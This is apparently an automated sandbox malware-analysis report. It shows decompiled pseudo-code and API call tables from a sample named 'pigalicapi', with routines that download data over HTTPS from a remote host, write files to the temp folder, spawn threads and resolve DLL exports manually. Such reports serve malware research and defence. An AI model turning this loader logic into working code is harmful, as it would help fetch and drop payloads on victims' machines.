                                                                                                                                                                                                                                                                          				if(_v40 == 0) {
                                                                                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                          						E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                          						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          						_t223 = E040097A0(0x10);
                                                                                                                                                                                                                                                                          						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                          						_v632 = _t223;
                                                                                                                                                                                                                                                                          						_v52 = _v632;
                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                                          							if( *_v52 != 0) {
                                                                                                                                                                                                                                                                          								E04007B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                          								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *_v52 = _v36;
                                                                                                                                                                                                                                                                          							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if( *_v52 != 0) {
                                                                                                                                                                                                                                                                          							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                                          							_v56 = CreateThread(0, 0, E040077B0, _v52, 0, 0);
                                                                                                                                                                                                                                                                          							CloseHandle(_v56);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          						E04002510(_v40, 0x400e290);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}


































                                                                                                                                                                                                                                                                          0x04006dac
                                                                                                                                                                                                                                                                          0x04006db3
                                                                                                                                                                                                                                                                          0x0400723f
                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                          0x04006dc9
                                                                                                                                                                                                                                                                          0x04006dd1
                                                                                                                                                                                                                                                                          0x04006ddc
                                                                                                                                                                                                                                                                          0x04006de5
                                                                                                                                                                                                                                                                          0x04006dee
                                                                                                                                                                                                                                                                          0x04006df7
                                                                                                                                                                                                                                                                          0x04006e00
                                                                                                                                                                                                                                                                          0x04006e09
                                                                                                                                                                                                                                                                          0x04006e15
                                                                                                                                                                                                                                                                          0x04007028
                                                                                                                                                                                                                                                                          0x04007039
                                                                                                                                                                                                                                                                          0x0400704a
                                                                                                                                                                                                                                                                          0x0400704f
                                                                                                                                                                                                                                                                          0x04007077
                                                                                                                                                                                                                                                                          0x04007099
                                                                                                                                                                                                                                                                          0x040070a6
                                                                                                                                                                                                                                                                          0x040070ac
                                                                                                                                                                                                                                                                          0x040070b6
                                                                                                                                                                                                                                                                          0x040070c6
                                                                                                                                                                                                                                                                          0x040070d5
                                                                                                                                                                                                                                                                          0x040071af
                                                                                                                                                                                                                                                                          0x040070db
                                                                                                                                                                                                                                                                          0x040070eb
                                                                                                                                                                                                                                                                          0x04007107
                                                                                                                                                                                                                                                                          0x04007114
                                                                                                                                                                                                                                                                          0x0400713d
                                                                                                                                                                                                                                                                          0x04007163
                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                          0x04007189
                                                                                                                                                                                                                                                                          0x040071bc
                                                                                                                                                                                                                                                                          0x040071c9
                                                                                                                                                                                                                                                                          0x040071e0
                                                                                                                                                                                                                                                                          0x040071e5
                                                                                                                                                                                                                                                                          0x040071e8
                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                          0x040071fe
                                                                                                                                                                                                                                                                          0x04007212
                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                          0x04007231
                                                                                                                                                                                                                                                                          0x04007236
                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                          0x040071c9
                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                          0x04006e1b
                                                                                                                                                                                                                                                                          0x04006e22
                                                                                                                                                                                                                                                                          0x04006e29
                                                                                                                                                                                                                                                                          0x04006e39
                                                                                                                                                                                                                                                                          0x04006eec
                                                                                                                                                                                                                                                                          0x04006ef1
                                                                                                                                                                                                                                                                          0x04006ef4
                                                                                                                                                                                                                                                                          0x04006e3f
                                                                                                                                                                                                                                                                          0x04006e4f
                                                                                                                                                                                                                                                                          0x04006e65
                                                                                                                                                                                                                                                                          0x04006e6c
                                                                                                                                                                                                                                                                          0x04006e8c
                                                                                                                                                                                                                                                                          0x04006e92
                                                                                                                                                                                                                                                                          0x04006e97
                                                                                                                                                                                                                                                                          0x04006e9a
                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                          0x04006ebb
                                                                                                                                                                                                                                                                          0x04006eca
                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                          0x04006ee3
                                                                                                                                                                                                                                                                          0x04006efb
                                                                                                                                                                                                                                                                          0x04007012
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006f01
                                                                                                                                                                                                                                                                          0x04006f08
                                                                                                                                                                                                                                                                          0x04006f1c
                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                          0x04006f2d
                                                                                                                                                                                                                                                                          0x04006f35
                                                                                                                                                                                                                                                                          0x04006f3a
                                                                                                                                                                                                                                                                          0x04006f3d
                                                                                                                                                                                                                                                                          0x04006f49
                                                                                                                                                                                                                                                                          0x04006f55
                                                                                                                                                                                                                                                                          0x04006f83
                                                                                                                                                                                                                                                                          0x04006f8b
                                                                                                                                                                                                                                                                          0x04006fa1
                                                                                                                                                                                                                                                                          0x04006fa6
                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                          0x04006f57
                                                                                                                                                                                                                                                                          0x04006f5d
                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                          0x04006fc6
                                                                                                                                                                                                                                                                          0x04006fcf
                                                                                                                                                                                                                                                                          0x04006fe9
                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                          0x04006fff
                                                                                                                                                                                                                                                                          0x0400700a
                                                                                                                                                                                                                                                                          0x0400700f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006fff

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04006DC9
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04006DD1
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04006E5F
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 04006EB5
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 04006EDD
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04006F7A
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04006FE3
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04006FF0
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 04007028
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04007059
                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 04007077
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04007093
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007101
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0400715D
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04007183
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 040071A9
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040071BC
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04007239
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                                          • String ID: TEMP
                                                                                                                                                                                                                                                                          • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                                          • Opcode ID: 39e740e402b3d58b52e9657545899331c46d826c986235e8a63d4a66dd2a8cdf
                                                                                                                                                                                                                                                                          • Instruction ID: 2b87ebad86062e1f9aa8347128cf2fe592da7145f1ccd4accac7794ca236a0a8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39e740e402b3d58b52e9657545899331c46d826c986235e8a63d4a66dd2a8cdf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF10975A00208EFEB58DF94D984F9DB7B5BB88304F248698E509BB390D775AE81CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04002900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				CHAR* _v28;
                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                          				void _v296;
                                                                                                                                                                                                                                                                          				void* _v300;
                                                                                                                                                                                                                                                                          				long _v304;
                                                                                                                                                                                                                                                                          				long _v308;
                                                                                                                                                                                                                                                                          				char* _t54;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                          					_t54 =  *0x400e004; // 0x400c398
                                                                                                                                                                                                                                                                          					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x400c3d2, 0x400c3d1, 3, 0, 0);
                                                                                                                                                                                                                                                                          						if(_v16 != 0) {
                                                                                                                                                                                                                                                                          							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                          								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                                          								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                                          								_v24 = 4;
                                                                                                                                                                                                                                                                          								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                                          								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                                          								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                                          								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                                          									_v308 = GetLastError();
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v300 = 0;
                                                                                                                                                                                                                                                                          									while(_v300 < _a12) {
                                                                                                                                                                                                                                                                          										_v304 = 0;
                                                                                                                                                                                                                                                                          										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                                          										if(_v304 != 0) {
                                                                                                                                                                                                                                                                          											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                                          											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v8 = _v300;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x04002909
                                                                                                                                                                                                                                                                          0x04002914
                                                                                                                                                                                                                                                                          0x04002936
                                                                                                                                                                                                                                                                          0x04002942
                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                          0x04002972
                                                                                                                                                                                                                                                                          0x04002979
                                                                                                                                                                                                                                                                          0x040029a3
                                                                                                                                                                                                                                                                          0x040029aa
                                                                                                                                                                                                                                                                          0x040029c0
                                                                                                                                                                                                                                                                          0x040029c9
                                                                                                                                                                                                                                                                          0x040029d0
                                                                                                                                                                                                                                                                          0x040029e8
                                                                                                                                                                                                                                                                          0x040029f9
                                                                                                                                                                                                                                                                          0x04002a0e
                                                                                                                                                                                                                                                                          0x04002a33
                                                                                                                                                                                                                                                                          0x04002ab5
                                                                                                                                                                                                                                                                          0x04002a35
                                                                                                                                                                                                                                                                          0x04002a35
                                                                                                                                                                                                                                                                          0x04002a3f
                                                                                                                                                                                                                                                                          0x04002a4a
                                                                                                                                                                                                                                                                          0x04002a73
                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                          0x04002a90
                                                                                                                                                                                                                                                                          0x04002a9f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002a82
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                          0x04002aeb

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(0400C398,00000001,00000000,00000000,00000000), ref: 0400293C
                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,0400C3D2,0400C3D1,00000003,00000000,00000000), ref: 0400296C
                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,GET,0400C3D8,1.1,00000000,00000000,80800000,00000000), ref: 0400299D
                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040029C0
                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 040029E8
                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002A0E
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C3EC,00000000,00000000), ref: 04002A1C
                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,0400C3EC,00000000), ref: 04002A2B
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 04002A73
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002AAF
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ACB
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002AD5
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ADF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                          • String ID: 1.1$GET$https://%s
                                                                                                                                                                                                                                                                          • API String ID: 2082764430-1670984264
                                                                                                                                                                                                                                                                          • Opcode ID: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                          • Instruction ID: 6d54c3b05ff69590bd14da6a4fff8ed2da31e3bdf774b399ca20979b5291bdcc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02510C71944218AFEB24CF94DC89BEEB7B4EB49700F108598F605B62C0C7B8AE94CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040035E0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v12;
                                                                                                                                                                                                                                                                          				char _v532;
                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                          				long _v540;
                                                                                                                                                                                                                                                                          				void* _v544;
                                                                                                                                                                                                                                                                          				long _v548;
                                                                                                                                                                                                                                                                          				CHAR* _v552;
                                                                                                                                                                                                                                                                          				void* _v556;
                                                                                                                                                                                                                                                                          				int _v560;
                                                                                                                                                                                                                                                                          				char _v820;
                                                                                                                                                                                                                                                                          				CHAR* _v824;
                                                                                                                                                                                                                                                                          				char _v1084;
                                                                                                                                                                                                                                                                          				signed char _v1085;
                                                                                                                                                                                                                                                                          				long _v1092;
                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                          				long _t124;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				_v12 = GetModuleHandleA(_a4);
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					E04002E50( &_v532,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                                          					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
                                                                                                                                                                                                                                                                          						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                          						if(_v536 != 0xffffffff) {
                                                                                                                                                                                                                                                                          							_v540 = GetFileSize(_v536, 0);
                                                                                                                                                                                                                                                                          							if(_v540 > 0) {
                                                                                                                                                                                                                                                                          								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
                                                                                                                                                                                                                                                                          								_t155 = _v544;
                                                                                                                                                                                                                                                                          								if(_v544 != 0) {
                                                                                                                                                                                                                                                                          									_v548 = 0;
                                                                                                                                                                                                                                                                          									ReadFile(_v536, _v544, _v540,  &_v548, 0);
                                                                                                                                                                                                                                                                          									_v556 = E04003370(_v536, _t155, _v544, _v540);
                                                                                                                                                                                                                                                                          									_v552 = E04003580(_a8, _v556, _a8);
                                                                                                                                                                                                                                                                          									_v560 = lstrlenA(_v552);
                                                                                                                                                                                                                                                                          									if(_v560 > 2 && _v560 < 0x100) {
                                                                                                                                                                                                                                                                          										_v824 = _v552;
                                                                                                                                                                                                                                                                          										_v1085 = 0;
                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v820, 0, 0x100);
                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v1084, 0, 0x100);
                                                                                                                                                                                                                                                                          										_v1092 = 0;
                                                                                                                                                                                                                                                                          										while(_v1092 < _v560) {
                                                                                                                                                                                                                                                                          											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                          												if(_v824[_v1092] != 0x2e) {
                                                                                                                                                                                                                                                                          													_t124 = _v1092 + 1;
                                                                                                                                                                                                                                                                          													__eflags = _t124;
                                                                                                                                                                                                                                                                          													_v1092 = _t124;
                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													lstrcpynA( &_v820, _v824, _v1092 + 1);
                                                                                                                                                                                                                                                                          													lstrcatA( &_v820, ".dll");
                                                                                                                                                                                                                                                                          													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
                                                                                                                                                                                                                                                                          													_v1085 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											break;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										if((_v1085 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          											_v8 = E040035E0( &_v820,  &_v1084);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									if(_v8 == 0 && _v552 != 0) {
                                                                                                                                                                                                                                                                          										_v1096 = _v552 - _v556;
                                                                                                                                                                                                                                                                          										_v8 = _v12 + _v1096;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									VirtualFree(_v556, 0, 0x8000);
                                                                                                                                                                                                                                                                          									VirtualFree(_v544, 0, 0x8000);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							CloseHandle(_v536);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                          0x040035e9
                                                                                                                                                                                                                                                                          0x040035fa
                                                                                                                                                                                                                                                                          0x04003601
                                                                                                                                                                                                                                                                          0x04003615
                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                          0x04003657
                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                          0x04003679
                                                                                                                                                                                                                                                                          0x04003686
                                                                                                                                                                                                                                                                          0x040036a2
                                                                                                                                                                                                                                                                          0x040036a8
                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                          0x040036b5
                                                                                                                                                                                                                                                                          0x040036dd
                                                                                                                                                                                                                                                                          0x040036f9
                                                                                                                                                                                                                                                                          0x04003712
                                                                                                                                                                                                                                                                          0x04003725
                                                                                                                                                                                                                                                                          0x04003732
                                                                                                                                                                                                                                                                          0x0400374e
                                                                                                                                                                                                                                                                          0x04003754
                                                                                                                                                                                                                                                                          0x04003769
                                                                                                                                                                                                                                                                          0x0400377f
                                                                                                                                                                                                                                                                          0x04003787
                                                                                                                                                                                                                                                                          0x040037a2
                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                          0x040037e0
                                                                                                                                                                                                                                                                          0x040037f2
                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                          0x0400379c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040037f4
                                                                                                                                                                                                                                                                          0x0400380c
                                                                                                                                                                                                                                                                          0x0400381e
                                                                                                                                                                                                                                                                          0x0400383c
                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                          0x040037f2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                          0x04003875
                                                                                                                                                                                                                                                                          0x0400385d
                                                                                                                                                                                                                                                                          0x0400387c
                                                                                                                                                                                                                                                                          0x04003893
                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                          0x040038a2
                                                                                                                                                                                                                                                                          0x040038b3
                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                          0x040038c7
                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                          0x040038d4
                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                          0x040038e0

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 040035F4
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 0400362D
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 04003651
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04003673
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400369C
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040036DD
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400371F
                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,-00000001), ref: 0400380C
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.dll), ref: 0400381E
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 0400383C
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 040038B3
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040038C7
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040038D4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
